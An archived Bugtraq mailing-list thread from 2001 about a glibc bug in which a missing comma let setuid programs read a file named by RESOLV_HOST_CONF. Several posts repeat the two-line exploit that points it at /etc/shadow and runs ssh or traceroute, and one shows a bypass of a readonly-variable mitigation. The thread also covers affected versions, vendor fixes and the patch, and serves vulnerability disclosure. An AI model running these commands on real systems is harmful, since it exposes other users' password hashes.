5939722 2001-01-10 00:06 -0700  /37 rader/ Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-10  20:20  av Brevbäraren (som är implementerad i) Python
Externa svar till: csteven@NEWHOPE.TERRAPLEX.COM
Mottagare: Bugtraq (import) <14706>
Ärende: Glibc Local Root Exploit
From: Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
Message-ID: <B6815818.E3F%csteven@newhope.terraplex.com>

Hi all,
  This has been bouncing around on vuln-dev and the debian-devel
lists. It effects glibc >= 2.1.9x and it would seem many if not all
OSes using these versions of glibc. Ben Collins writes, "This wasn't
supposed to happen, and the actual fix was a missing comma in the
list of secure env vars that were supposed to be cleared when a
program starts up suid/sgid (including RESOLV_HOST_CONF)." The
exploit varies from system to system but in our devel version of
Yellow Dog Linux I was able to print the /etc/shadow file as a normal
user in the following manner:

export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com

  Other programs have the same effect depending on the defaults for
the system. I have tested this on Red Hat 7.0, Yellow Dog Linux 2.0
(prerelease), and Debian Woody. Others have reported similar results
on slackware and even "home brew[ed]" GNU/Linux.

Best Regards,
Charles Stevenson
Software Engineer

  Terra Soft Solutions, Inc

  Yellow Dog Linux

  Black Lab Linux
(5939722) --------------------------------(Ombruten)
Kommentar i text 5939728 av Mathias Hansson (glutinous glop in your galligaskins)
Kommentar i text 5939858
Kommentar i text 5940291 av Thomas T. Veldhouse <veldy@VELDY.NET>
Kommentar i text 5940334 av Ben Collins <bcollins@DEBIAN.ORG>
Kommentar i text 5940443 av Pedro Margate <pedro@ECLIPSE.NET>
Kommentar i text 5940816 av Digital Overdrive <digiover@DSINET.ORG>
Kommentar i text 5940840 av Joe <joe@BLARG.NET>
Kommentar i text 5940850 av Brian <bruns@MAGENET.COM>
Kommentar i text 5940852 av Digital Overdrive <digiover@DSINET.ORG>
5940291 2001-01-10 12:31 -0600  /53 rader/ Thomas T. Veldhouse <veldy@VELDY.NET>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-10  23:22  av Brevbäraren (som är implementerad i) Python
Externa svar till: veldy@VELDY.NET
Mottagare: Bugtraq (import) <14719>
Kommentar till text 5939722 av Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
Ärende: Re: Glibc Local Root Exploit
From: "Thomas T. Veldhouse" <veldy@VELDY.NET>
Message-ID: <011d01c07b33$88e288f0$3028680a@tgt.com>

This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
following your example.

Tom Veldhouse

----- Original Message -----
From: "Charles Stevenson" <csteven@NEWHOPE.TERRAPLEX.COM>
Sent: Wednesday, January 10, 2001 1:06 AM
Subject: Glibc Local Root Exploit

> Hi all,
>   This has been bouncing around on vuln-dev and the debian-devel lists. It
> effects glibc >= 2.1.9x and it would seem many if not all OSes using these
> versions of glibc. Ben Collins writes, "This wasn't supposed to happen,
> the actual fix was a missing comma in the list of secure env vars that
> supposed to be cleared when a program starts up suid/sgid (including
> RESOLV_HOST_CONF)." The exploit varies from system to system but in our
> devel version of Yellow Dog Linux I was able to print the /etc/shadow file
> as a normal user in the following manner:
> export RESOLV_HOST_CONF=/etc/shadow
> ssh whatever.host.com
>   Other programs have the same effect depending on the defaults for the
> system. I have tested this on Red Hat 7.0, Yellow Dog Linux 2.0
> (prerelease), and Debian Woody. Others have reported similar results on
> slackware and even "home brew[ed]" GNU/Linux.
> Best Regards,
> Charles Stevenson
> Software Engineer
> --
>   Terra Soft Solutions, Inc
>   http://www.terrasoftsolutions.com/
>   Yellow Dog Linux
>   http://www.yellowdoglinux.com/
>   Black Lab Linux
>   http://www.blacklablinux.com
(5940291) ------------------------------------------
5940334 2001-01-10 14:22 -0500  /43 rader/ Ben Collins <bcollins@DEBIAN.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-10  23:40  av Brevbäraren (som är implementerad i) Python
Externa svar till: bcollins@DEBIAN.ORG
Mottagare: Bugtraq (import) <14720>
Kommentar till text 5939722 av Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
Ärende: Re: Glibc Local Root Exploit
From: Ben Collins <bcollins@DEBIAN.ORG>
Message-ID: <20010110142222.E437@visi.net>

On Wed, Jan 10, 2001 at 12:06:48AM -0700, Charles Stevenson wrote:
> Hi all,
>   This has been bouncing around on vuln-dev and the debian-devel lists. It
> effects glibc >= 2.1.9x and it would seem many if not all OSes using these
> versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
> the actual fix was a missing comma in the list of secure env vars that were
> supposed to be cleared when a program starts up suid/sgid (including
> RESOLV_HOST_CONF)." The exploit varies from system to system but in our
> devel version of Yellow Dog Linux I was able to print the /etc/shadow file
> as a normal user in the following manner:
> export RESOLV_HOST_CONF=/etc/shadow
> ssh whatever.host.com
>   Other programs have the same effect depending on the defaults for the
> system. I have tested this on Red Hat 7.0, Yellow Dog Linux 2.0
> (prerelease), and Debian Woody. Others have reported similar results on
> slackware and even "home brew[ed]" GNU/Linux.

Just a note. The latest *released* Debian (2.2, aka potato) is not
vulnerable to this problem, since it uses glibc 2.1.3. Our unreleased
testing and devel (aka woody and sid) dists are vulnerably, atleast
today. The fixed packages are being uploaded, and should be on mirrors
within 24-48 hours.

Don't expect a security announcement from this on Debian, since we
only do that for released distributions, which woody and sid are not.

Also, to give credit where credit is due, Jakub Jelinek actually
produced the patch that fixes this particular problem. I was merely
stating what I knew (in the quote above).

/  Ben Collins  --  ...on that fantastic voyage...  --  Debian GNU/Linux   \
`  bcollins@debian.org  --  bcollins@openldap.org  --  bcollins@linux.com  '
(5940334) --------------------------------(Ombruten)
5940816 2001-01-10 23:43 +0100  /54 rader/ Digital Overdrive <digiover@DSINET.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-11  03:32  av Brevbäraren (som är implementerad i) Python
Externa svar till: digiover@dsinet.org
Mottagare: Bugtraq (import) <14727>
Kommentar till text 5939722 av Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
Ärende: Re: Glibc Local Root Exploit
From: Digital Overdrive <digiover@DSINET.ORG>
Message-ID: <3A5CE593.F49B6DAA@dsinet.org>

Charles Stevenson wrote:
> Hi all,
>   This has been bouncing around on vuln-dev and the debian-devel lists. It
> effects glibc >= 2.1.9x and it would seem many if not all OSes using these
> versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
> the actual fix was a missing comma in the list of secure env vars that were
> supposed to be cleared when a program starts up suid/sgid (including
> RESOLV_HOST_CONF)." The exploit varies from system to system but in our
> devel version of Yellow Dog Linux I was able to print the /etc/shadow file
> as a normal user in the following manner:
> export RESOLV_HOST_CONF=/etc/shadow
> ssh whatever.host.com

huge typo in my previous post...
services has to be profiles ;-)

[Credits to ^herman^ in #hit2000 on ircnet]
A temp. sollution is to place this in /etc/profiles:

jan@flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow
bash: RESOLV_HOST_CONF: readonly variable

But even here is a workaround for :
Make a script (e.g. blaat)

export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com

~$ sh --noprofile blaat

[again credits to ^herman^]


Jan (Digital Overdrive)

 .~.   http://www.dsinet.org | http://www.dsinet.org/hackfaq
 /V\   digiover@dsinet.org |  digiover@cotse.com
/( )\
(5940816) ------------------------------------------
5940852 2001-01-10 23:30 +0100  /38 rader/ Digital Overdrive <digiover@DSINET.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-11  04:52  av Brevbäraren (som är implementerad i) Python
Externa svar till: digiover@dsinet.org
Mottagare: Bugtraq (import) <14739>
Kommentar till text 5939722 av Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
Ärende: Re: Glibc Local Root Exploit
From: Digital Overdrive <digiover@DSINET.ORG>
Message-ID: <3A5CE268.E25A3CC1@dsinet.org>

Charles Stevenson wrote:
> Hi all,
>   This has been bouncing around on vuln-dev and the debian-devel lists. It
> effects glibc >= 2.1.9x and it would seem many if not all OSes using these
> versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
> the actual fix was a missing comma in the list of secure env vars that were
> supposed to be cleared when a program starts up suid/sgid (including
> RESOLV_HOST_CONF)." The exploit varies from system to system but in our
> devel version of Yellow Dog Linux I was able to print the /etc/shadow file
> as a normal user in the following manner:
> export RESOLV_HOST_CONF=/etc/shadow
> ssh whatever.host.com

[Credits to ^herman^ in #hit2000 on ircnet]
A temp. sollution is to place this in /etc/services:

jan@flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow
bash: RESOLV_HOST_CONF: readonly variable


Jan (Digital Overdrive)

 .~.   Dutch Security Information Network : http://www.dsinet.org
 /V\   digiover@dsinet.org |  digiover@cotse.com
/( )\
(5940852) ------------------------------------------
5940774 2001-01-10 17:53 -0800  /97 rader/ Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-11  03:00  av Brevbäraren (som är implementerad i) Python
Externa svar till: bgreenbaum@SECURITYFOCUS.COM
Mottagare: Bugtraq (import) <14725>
Ärende: Re: Glibc Local Root Exploit
From: Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
Message-ID: <Pine.GSO.4.30.0101101741160.531-100000@mail>

Summary of responses:

From: Jag <agrajag@linuxpower.org>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.
I have reproduced it with glibc-2.2 and openssh-2.3.0p1  The key is that
you must actually ssh to a valid host.  If ssh can't resolve the host,
it won't display the contents of the file.

From: Lukasz Trabinski <lukasz@lt.wsisiz.edu.pl>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.

Let's test it. :-)

[lukasz@lt lukasz]$ ls -all /usr/bin/ssh
-rwsr-xr-x    1 root     root       176036 Jan  6 14:34 /usr/bin/ssh
[lukasz@lt lukasz]$ export RESOLV_HOST_CONF=/etc/shadow
[lukasz@lt lukasz]$ ssh lt
/etc/shadow: line 1: bad command
/etc/shadow: line 2: bad command `bin:x:10679:0:99999:7:::'
/etc/shadow: line 3: bad command `daemon:x:10679:0:99999:7:::'
/etc/shadow: line 4: bad command `adm:x:10679:0:99999:7:::

Nice. :)

[lukasz@lt lukasz]$ rpm -q openssh
[lukasz@lt lukasz]$ rpm -q glibc
All was taken from RH updates.

[lukasz@lt lukasz]$ cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)


[lukasz@yyy lukasz]$ ll /usr/bin/ssh
-rwxr-xr-x    1 root     root       176932 Nov 21 23:53 /usr/bin/ssh
[lukasz@xxx lukasz]$ ssh xxx
lukasz@xxx's password:

glibc 2.2-9 openssh-2.3.0, RH 7.0.

Only passwd needs setuid flag. :)

From: Alexander Schreiber <alexander.schreiber@informatik.tu-chemnitz.de>

Tested on Debian 2.2 (potato) with OpenSSH-1.2.3 and libc6 2.1.3: does
not work.

From: Michael Devogelaere <michael@digibel.be>

It works on my system:
glibc 2.2 and openssh-2.3.0p1 (all latest updates from redhat)
(luckily enough i don't tolerate users on my system <grin>)

From: elliptic <elliptic@cipherpunks.com>

Likewise, I can not reproduce this bug on Slackware Linux 7.0, which
is currently using glibc version 2.1.3.  Additionally, this is the
revision of glibc included with Slackware 7.1, which would likely
also not be vulnerable.

From: Joseph Nicholas Yarbrough <nyarbrough@lurhq.com>

I am unable to reproduce this using slackware 7.1(glibc2.1.3).  What
version of slackware were these "others" reporting positive results

From: Lukasz Trabinski <lukasz@lt.wsisiz.edu.pl>

> [lukasz@lt lukasz]$ rpm -q openssh
> openssh-2.3.0p1-4

I have tested 1.5-1.2.30 (with ssh root setuid, too. We can read
/etc/shadow, too). :-)

(5940774) --------------------------------(Ombruten)
5948690 2001-01-11 02:04 +0000  /25 rader/ Simon Cozens <simon@COZENS.NET>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-12  17:49  av Brevbäraren (som är implementerad i) Python
Externa svar till: simon@COZENS.NET
Mottagare: Bugtraq (import) <14754>
Kommentar till text 5940774 av Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
Ärende: Re: Glibc Local Root Exploit
From: Simon Cozens <simon@COZENS.NET>
Message-ID: <20010111020406.A9633@pembro26.pmb.ox.ac.uk>

And a patch. Yeah, it's pretty obvious, but nobody's produced it yet.
Of course, it'll take you forever to *compile* the thing. :)

--- sysdeps/generic/unsecvars.h~    Wed Jan 10 23:37:09 2001
+++ sysdeps/generic/unsecvars.h Wed Jan 10 23:37:20 2001
@@ -5,7 +5,7 @@
   "LOCPATH",                                     \
   "MALLOC_TRACE",                                \
   "NLSPATH",                                     \
-  "RESOLV_HOST_CONF"                                 \
+  "RESOLV_HOST_CONF",                                \
   "RES_OPTIONS",                                 \
   "TMPDIR",                                      \

He who makes a beast of himself gets rid of the pain of being a man.
-H.S. Thompson
(5948690) ------------------------------------------
5948822 2001-01-10 20:05 -0700  /30 rader/ Jeffrey Denton <dentonj@C2I2.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-12  18:15  av Brevbäraren (som är implementerad i) Python
Externa svar till: dentonj@C2I2.COM
Mottagare: Bugtraq (import) <14758>
Kommentar till text 5940774 av Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
Ärende: Re: Glibc Local Root Exploit
From: Jeffrey Denton <dentonj@C2I2.COM>
Message-ID: <Pine.LNX.4.31.0101101957320.1372-100000@wookie.c2i2.com>

Hopefully the BUGTRAQ moderators will catch and delete my first
message.  This one has a little more detail.

> ------------------------------------------------------
> From: Joseph Nicholas Yarbrough <nyarbrough@lurhq.com>
> I am unable to reproduce this using slackware 7.1(glibc2.1.3).
> What version of slackware were these "others" reporting positive results from?

"slackware-current", Slackware's developers release, uses glibc2.2
and is vulnerable.  After that variable is set, the only two commands
I was able to find that exploited this bug and returned the shadow
file are ssh and traceroute:

$ssh localhost
$traceroute localhost

They do not work if the suid bit is removed.

This does not effect any of Slackware's stable releases.

(5948822) --------------------------------(Ombruten)
5948932 2001-01-11 10:22 -0500  /22 rader/ Matt Zimmerman <mdz@CSH.RIT.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-12  18:39  av Brevbäraren (som är implementerad i) Python
Externa svar till: mdz@CSH.RIT.EDU
Mottagare: Bugtraq (import) <14761>
Kommentar till text 5940774 av Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
Ärende: Re: Glibc Local Root Exploit
On Wed, Jan 10, 2001 at 05:53:03PM -0800, Ben Greenbaum wrote:

> Summary of responses:
> ----------------------------------
> From: Jag <agrajag@linuxpower.org>
> On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> > This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> > following your example.
> I have reproduced it with glibc-2.2 and openssh-2.3.0p1  The key is that
> you must actually ssh to a valid host.  If ssh can't resolve the host,
> it won't display the contents of the file.

This is not true.  host.conf file is read _before_ the actual query
takes place, as its options affect how the query is done.  It does
not matter what hostname is passed to the resolver.

 - mdz
(5948932) --------------------------------(Ombruten)
Bilaga (application/pgp-signature) i text 5948933
5948933 2001-01-11 10:22 -0500  /10 rader/ Matt Zimmerman <mdz@CSH.RIT.EDU>
Importerad: 2001-01-12  18:39  av Brevbäraren (som är implementerad i) Python
Externa svar till: mdz@CSH.RIT.EDU
Mottagare: Bugtraq (import) <14762>
Bilaga (text/plain) till text 5948932
Ärende: Bilaga till: Re: Glibc Local Root Exploit
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org

(5948933) ------------------------------------------